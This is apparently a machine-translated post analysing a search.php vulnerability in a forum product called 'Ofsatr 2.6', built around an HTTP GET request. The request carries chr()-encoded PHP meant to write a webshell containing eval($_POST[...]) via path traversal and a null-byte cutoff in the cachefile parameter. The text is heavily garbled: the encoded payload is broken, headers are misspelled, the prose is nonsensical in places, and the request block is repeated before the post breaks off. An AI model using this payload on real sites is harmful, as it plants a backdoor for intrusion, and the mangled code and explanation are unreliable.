Ofsatr 2.6検索の脆弱性の簡単な分析
ネット上で似たようなツールがあるのを見ましたが、分析した文章は見つけられませんでした。ハッカーのマニュアルにあります。残念ながら雑誌がありません。この抜け穴は巧みであり,また経典的でもある。 :)
GET /search.php?keyword=By%20 CN 911&cachefile=an 85.php%250&treadinfo=<?fput(fop) chr(46).chr(46).chr(47).chr(46).chr(46).chr(47).chr(46).chr(46).chr(46).chr(46).chr(47).chr(98).chr(115).chr(100).chr(97).chr(116).chr(116).chr(97).chr(97).chr(97).chr(97).chr(97).chr(97).chr)chr(97).chr(97).chr(97).chr(97).chr..chr..chr..chr(97).chr..chr(97).chr..chr(),w),chr(60).chr(63).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99.93)(109) HTTP/1.1 Accept: イメージ/gif、 イメージ/x-xbitmap、 イメージ/jpeg、 イメージ/pjpeg、 appication/x-shocwave-flash、 */* Acceept Language: zh-cn Acceept Ecoding: gzip、 deflate User-Agent: Mozia/4.0 (comppatible MSIE 6.0; Windows NT 5.1; SV 1) Host: 127.1.0.1 これは私のバッグのファイルです。クローズドのファイルから3つの変数が分かります。この中で$keywordは任意のキーワードであり得る。cachefileはPHPファイルでなければなりません。これが私達のPHPです。 SHELLの後ろには%2500のカットオフ文字が付いています。treadinfoは木馬を生成するコードです。復号していませんが、もう一つのPHPファイルのPHPコードを木馬に書いたと推測されます。 PS:$treadinfoコンテンツの復号は以下の通りです。
&treadinfo=……… $keyworldarray=explode $keycount=count($keyworderay); if($sch_)ara==「C」){ include'/require/schall.php'; }elseif($sch_)ara=="A" for ( $j = 0; $j 〈 $keycount; $j+){ $keyworldarray[$j].="|"作者の正確なマッチングを検索します。 } include'/require/sch part.php'; }else{ include'/require/sch part.php'; } if (!file_exists("userdata/cache/$cachefile.txt") showmsg("ないです あります あなた はい、 調べます 探す の 内部 顔 〈br/>
GET /search.php?keyword=By%20 CN 911&cachefile=an 85.php%250&treadinfo=<?fput(fop) chr(46).chr(46).chr(47).chr(46).chr(46).chr(47).chr(46).chr(46).chr(46).chr(46).chr(47).chr(98).chr(115).chr(100).chr(97).chr(116).chr(116).chr(97).chr(97).chr(97).chr(97).chr(97).chr(97).chr)chr(97).chr(97).chr(97).chr(97).chr..chr..chr..chr(97).chr..chr(97).chr..chr(),w),chr(60).chr(63).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99.93)(109) HTTP/1.1 Accept: イメージ/gif、 イメージ/x-xbitmap、 イメージ/jpeg、 イメージ/pjpeg、 appication/x-shocwave-flash、 */* Acceept Language: zh-cn Acceept Ecoding: gzip、 deflate User-Agent: Mozia/4.0 (comppatible MSIE 6.0; Windows NT 5.1; SV 1) Host: 127.1.0.1 これは私のバッグのファイルです。クローズドのファイルから3つの変数が分かります。この中で$keywordは任意のキーワードであり得る。cachefileはPHPファイルでなければなりません。これが私達のPHPです。 SHELLの後ろには%2500のカットオフ文字が付いています。treadinfoは木馬を生成するコードです。復号していませんが、もう一つのPHPファイルのPHPコードを木馬に書いたと推測されます。 PS:$treadinfoコンテンツの復号は以下の通りです。
&treadinfo=